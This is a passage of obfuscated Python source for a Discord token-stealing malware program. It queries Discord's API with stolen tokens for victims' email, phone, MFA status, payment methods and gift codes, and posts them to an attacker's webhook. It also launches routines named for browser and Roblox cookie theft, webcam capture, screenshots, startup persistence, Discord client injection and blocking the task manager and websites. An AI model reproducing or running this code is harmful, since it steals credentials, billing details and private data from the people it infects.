            PUVTTUQTJSMAZJBICCCWMKKVTJIJRMNKEBVHYQEACVDYKIWRAIDJXOIBKXEBVEKMAMNEHQCNPMXOBFVTSIXKCDLMQXGIUQXDO = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('email', "None")
            WCNBFEJVDUZHAMNOQWFVCHIUDGUZGXETBRJCXICCKDKNZWXKUSSTWYQSGTESQIHMBLWSSTSHQLDJUEOOVEZYAYERPJPYDDGKYZG = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('verified', "None")
            DNRQKWRRYZSLTURSHHKGVGLQSLWKJJGXSBACTFVDEKRYNFRVOBWJQWESIXLQYZIADDZLQLQXUVYGDWIWWEUMLRZCSI = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('phone', "None")
            FGNSNNVBIRDDGEQOMHWUULMHGAMWLJPZYFJYUHXERBPSIZWCTFXTIVGKBEIC = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('locale', "None")
            MLHDPPMDQHWVBEOGIJTDWMEJBDNBRUZFJNJXDWQACRSYOEYFMRNJNHFLBBKBQYYYCLMEYVKHHQ = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('mfa_enabled', "None")

            try:
                if INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('premium_type', 'None') == 0:
                    HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = 'False'
                elif INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('premium_type', 'None') == 1:
                    HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = 'Nitro Classic'
                elif INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('premium_type', 'None') == 2:
                    HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = 'Nitro Boosts'
                elif INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('premium_type', 'None') == 3:
                    HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = 'Nitro Basic'
                else:
                    HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = 'False'
            except:
                HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU = "None"

            try: 
                JQAEUZZNAUMTTUUHYUIUREZWFMSTZASWTRNYTBILEMTUUEOFUK = f"https://cdn.discordapp.com/avatars/{GYXJAJMKGYOPNWPXMLZHFVDAIFRMMFOWVCADXFTMTAXKQKNPBLEYXWBYADEPTCCZUW}/{INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{GYXJAJMKGYOPNWPXMLZHFVDAIFRMMFOWVCADXFTMTAXKQKNPBLEYXWBYADEPTCCZUW}/{INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{GYXJAJMKGYOPNWPXMLZHFVDAIFRMMFOWVCADXFTMTAXKQKNPBLEYXWBYADEPTCCZUW}/{INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR['avatar']}.png"
            except: 
                JQAEUZZNAUMTTUUHYUIUREZWFMSTZASWTRNYTBILEMTUUEOFUK = YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ

            try:
                NABODXMBMQRAUDJEWMTLADAJJYUURFUGYJAZKDVPTHSYTSWOQUXLEUROFBXQRYRHVCIZTMTJGROPXEXAZFQHVYLCGILUKSGSQT = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd}).json()
                if NABODXMBMQRAUDJEWMTLADAJJYUURFUGYJAZKDVPTHSYTSWOQUXLEUROFBXQRYRHVCIZTMTJGROPXEXAZFQHVYLCGILUKSGSQT:
                    YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE = []

                    for v4r_method in NABODXMBMQRAUDJEWMTLADAJJYUURFUGYJAZKDVPTHSYTSWOQUXLEUROFBXQRYRHVCIZTMTJGROPXEXAZFQHVYLCGILUKSGSQT:
                        if v4r_method['type'] == 1:
                            YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE.append('CB')
                        elif v4r_method['type'] == 2:
                            YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE.append("Paypal")
                        else:
                            YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE.append('Other')
                    YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE = ' / '.join(YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE)
                else:
                    YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE = "None"
            except:
                YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE = "None"

            try:
                CQOXEHCRUWHEIXFBLZRIBWDZLJRVECXFXKBTATWWEHMNJNXCBVFQMYYCWFDAKTIYKRYGZFX = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd}).json()
                if CQOXEHCRUWHEIXFBLZRIBWDZLJRVECXFXKBTATWWEHMNJNXCBVFQMYYCWFDAKTIYKRYGZFX:
                    KJEULGDMUHKERIDPBHXUBKFSMLXXSIAUPTYWYTLVFLJLMTMQJKKR = []
                    for HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS in CQOXEHCRUWHEIXFBLZRIBWDZLJRVECXFXKBTATWWEHMNJNXCBVFQMYYCWFDAKTIYKRYGZFX:
                        WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ = HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS['promotion']['outbound_title']
                        HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS = HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS['code']
                        KUNMZCSMJNLLTAGIHFXHDSQNYDJROEBLTDLDBQZOQKQTYYECCJJUNBIHTMHNEQRKUTMTEZFWJNLEFIGXPALUFDKJBB = f"Gift: {WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ}\nCode: {HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS}"
                        if len('\n\n'.join(HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS)) + len(KUNMZCSMJNLLTAGIHFXHDSQNYDJROEBLTDLDBQZOQKQTYYECCJJUNBIHTMHNEQRKUTMTEZFWJNLEFIGXPALUFDKJBB) >= 1024:
                            break
                        KJEULGDMUHKERIDPBHXUBKFSMLXXSIAUPTYWYTLVFLJLMTMQJKKR.append(KUNMZCSMJNLLTAGIHFXHDSQNYDJROEBLTDLDBQZOQKQTYYECCJJUNBIHTMHNEQRKUTMTEZFWJNLEFIGXPALUFDKJBB)
                    if len(KJEULGDMUHKERIDPBHXUBKFSMLXXSIAUPTYWYTLVFLJLMTMQJKKR) > 0:
                        HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS = '\n\n'.join(KJEULGDMUHKERIDPBHXUBKFSMLXXSIAUPTYWYTLVFLJLMTMQJKKR)
                    else:
                        HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS = "None"
                else:
                    HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS = "None"
            except:
                HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS = "None"
        
            v4r_software_name, BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK = OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP.get(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU} "{LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}"`:', color=BDFLBKPPAYCEVJQPWDIWXNXQUNECVISUTKVOYQCDWYOBEGMWZFQDCETZCYLEXDATKFHPTLDCMSBLZSTHFPCWDMRO)      
            embed.add_field(name=":file_folder: Path:", value=f"```{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{YTTKIXVYKFTHQKNEGYTEJCSITQTVYHBGURYGDHALVURSWNONNFLEBCGUGXBDCUQKQRDSAMUGHLZLZMYEVHLRWEUM}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{BWFFVFBOHDPSVOEVKWSLSGXGLKXXOSKKZPEYDWKMKKZDJTFRADDQYRAFQI}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{GYXJAJMKGYOPNWPXMLZHFVDAIFRMMFOWVCADXFTMTAXKQKNPBLEYXWBYADEPTCCZUW}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{PUVTTUQTJSMAZJBICCCWMKKVTJIJRMNKEBVHYQEACVDYKIWRAIDJXOIBKXEBVEKMAMNEHQCNPMXOBFVTSIXKCDLMQXGIUQXDO}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{WCNBFEJVDUZHAMNOQWFVCHIUDGUZGXETBRJCXICCKDKNZWXKUSSTWYQSGTESQIHMBLWSSTSHQLDJUEOOVEZYAYERPJPYDDGKYZG}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{DNRQKWRRYZSLTURSHHKGVGLQSLWKJJGXSBACTFVDEKRYNFRVOBWJQWESIXLQYZIADDZLQLQXUVYGDWIWWEUMLRZCSI}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{HETEFSMXXJVQJMFESOKHRTERYVJTYCFQMPPOUTGNDFZEWLMBHYNCDHXSEPZPLQDWU}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{FGNSNNVBIRDDGEQOMHWUULMHGAMWLJPZYFJYUHXERBPSIZWCTFXTIVGKBEIC}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{YHWZETGHJVSZTDIMESCFFHQMEAYUOUZKZWUKWJBELDWRITWQZVXWACNNMZNYAWE}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{HSYJWDXIJKJNTTBGKSAMDGDWSDPIGLXGSAPIRIRIPXVDCCZMIYLEQMCDJVEGBUGXOMKDPS}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{MLHDPPMDQHWVBEOGIJTDWMEJBDNBRUZFJNJXDWQACRSYOEYFMRNJNHFLBBKBQYYYCLMEYVKHHQ}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=JQAEUZZNAUMTTUUHYUIUREZWFMSTZASWTRNYTBILEMTUUEOFUK)
            embed.set_footer(text=NBDPMWIGZSQUQVDUQFLEXGMFSAOIMQPTDPVPFOYDNQXAVNCDRDTDGKYGE, icon_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)
            PWYOJHUYZGBMJBXTVFCFNPUTUTBZEIBBULPCFVUKBZOEXPRNURXLUEBTSJYUGUTPXTYKJQ.send(embed=embed, username=UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO, avatar_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)

    upload_t0k3n5()

try: requests.post(COFKNPMTPGIKKBAIQORAXHJSSLQJRBIPMSVNXJVMZFDTKEASGWOU, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO, 'avatar_url': YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(COFKNPMTPGIKKBAIQORAXHJSSLQJRBIPMSVNXJVMZFDTKEASGWOU, json={'content': f'****╚══════════════════{LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}══════════════════╝****', 'username': UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO, 'avatar_url': YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
